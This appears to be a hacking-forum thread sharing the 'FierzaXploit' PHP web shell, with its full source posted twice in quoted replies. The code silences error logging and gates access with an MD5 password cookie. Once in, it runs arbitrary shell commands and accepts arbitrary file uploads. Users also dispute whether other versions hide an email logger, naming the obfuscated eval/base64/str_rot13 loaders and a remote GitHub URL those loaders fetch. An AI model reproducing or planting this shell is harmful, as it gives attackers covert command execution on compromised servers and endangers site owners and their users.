• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

FierzaXploit Shell [LeVeL23HackTools.CoM]

Status
Not open for further replies.

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
27
Reaction score
45,549
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%
35.png


To see this hidden content, you must like this content.
 
no fierzaxploit shell have mail logger inside, every fierzaxploit shell has email logger inside the code, i know because i've reverse the encryption back then so i suggest you to delete it lol, but its up to you ;)

 
no fierzaxploit shell have mail logger inside, every fierzaxploit shell has email logger inside the code, i know because i've reverse the encryption back then so i suggest you to delete it lol, but its up to you 😉
2s4cx43kCan you share the results?

<?php
@error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@ini_set('error_log', NULL);
@ini_set('open_basedir', '');
@ini_set('safe_mode', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('SELF', $_SERVER['PHP_SELF']);
@define('SERVER_SOFTWARE', $_SERVER['SERVER_SOFTWARE']);
@define('SET_COOKIE', base64_decode('c2V0Y29va2ll'));
@define('VERSION', '1.0');
@header("Content-Type: text/html; charset=UTF-8");
$back_connect_p = 'bXJia1s6ezt1cmxjcHhsO2B5amx6ZW5id2hzM2ppd2pzNGlrY2l4ZGVsaA==';

function ws($string) {
$encoded = "";
for ($i=0; $i < strlen($string); $i++) {
$encoded .= '%' . bin2hex($string[$i]);
}
return $encoded;
}

$pass = "21232f297a57a5a743894a0e4a801fc3";
$salt = "nazi";
if (isset($_POST['pass']) && (md5($_POST['pass'].$salt)==$pass)) {
setcookie("pass", $pass);
}
if (isset($_GET['logout'])) {
setcookie("pass", "", time() - 3600);
header("Location: ".SELF);
}
if (isset($_COOKIE['pass']) && ($_COOKIE['pass']==$pass)) {
if (isset($_POST['cmd'])) {
echo "<pre>".shell_exec($_POST['cmd'])."</pre>";
} elseif (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
echo "<pre>Uploaded: ".$_FILES['file']['name']."</pre>";
} else {
echo '<html><body><form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file"><input type="submit" value="Upload">';
echo '</form>';
echo '<form method="post">';
echo '<input type="text" name="cmd" autofocus>';
echo '<input type="submit" value="Execute">';
echo '</form>';
echo '</body></html>';
}
exit;
} else {
echo '<html><body><form method="post">';
echo '<input type="password" name="pass" autofocus>';
echo '<input type="submit" value="Login">';
echo '</form></body></html>';
}
?>




My research determines that it does not contain any functionality related to a mail logger.

 
Last edited by a moderator:
Can you share the results?

<?php
@error_reporting(0);
@ini_set('display_errors', 0);
@ini_set('log_errors', 0);
@ini_set('error_log', NULL);
@ini_set('open_basedir', '');
@ini_set('safe_mode', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('SELF', $_SERVER['PHP_SELF']);
@define('SERVER_SOFTWARE', $_SERVER['SERVER_SOFTWARE']);
@define('SET_COOKIE', base64_decode('c2V0Y29va2ll'));
@define('VERSION', '1.0');
@header("Content-Type: text/html; charset=UTF-8");
$back_connect_p = 'bXJia1s6ezt1cmxjcHhsO2B5amx6ZW5id2hzM2ppd2pzNGlrY2l4ZGVsaA==';

function ws($string) {
$encoded = "";
for ($i=0; $i < strlen($string); $i++) {
$encoded .= '%' . bin2hex($string[$i]);
}
return $encoded;
}

$pass = "21232f297a57a5a743894a0e4a801fc3";
$salt = "nazi";
if (isset($_POST['pass']) && (md5($_POST['pass'].$salt)==$pass)) {
setcookie("pass", $pass);
}
if (isset($_GET['logout'])) {
setcookie("pass", "", time() - 3600);
header("Location: ".SELF);
}
if (isset($_COOKIE['pass']) && ($_COOKIE['pass']==$pass)) {
if (isset($_POST['cmd'])) {
echo "<pre>".shell_exec($_POST['cmd'])."</pre>";
} elseif (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']);
echo "<pre>Uploaded: ".$_FILES['file']['name']."</pre>";
} else {
echo '<html><body><form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="file"><input type="submit" value="Upload">';
echo '</form>';
echo '<form method="post">';
echo '<input type="text" name="cmd" autofocus>';
echo '<input type="submit" value="Execute">';
echo '</form>';
echo '</body></html>';
}
exit;
} else {
echo '<html><body><form method="post">';
echo '<input type="password" name="pass" autofocus>';
echo '<input type="submit" value="Login">';
echo '</form></body></html>';
}
?>




My research determines that it does not contain any functionality related to a mail logger.
dEEpEsti just reverse it and this is a new one because the other versions of fierza xploit shell has email logger inside it insted a file_get_contents functions

there is 2 possible logger inside it, not possible actually im pretty sure its a logger

first find this code eval(gzuncompress(base64_decode(str_rot13( decode it and you'll see a file_get_contents functions to raw github (https://raw.githubusercontent.com/1337r0j4n/0/main/0/POST.txt) that will lead you to this site [SIZE=1em]
This link is hidden for visitors. Please Log in or register now.
[/SIZE]

second find this code eval(str_rot13(gzinflate(str_rot13(base64_decode( decode it and you'll also see a file_get_contents functions to 000webhostapp (
This link is hidden for visitors. Please Log in or register now.
 but i think it got banned by the provider LOL

full reversed code (sorry if its broken XD)
This link is hidden for visitors. Please Log in or register now.

 

 
Last edited by a moderator:
Status
Not open for further replies.
Back
Top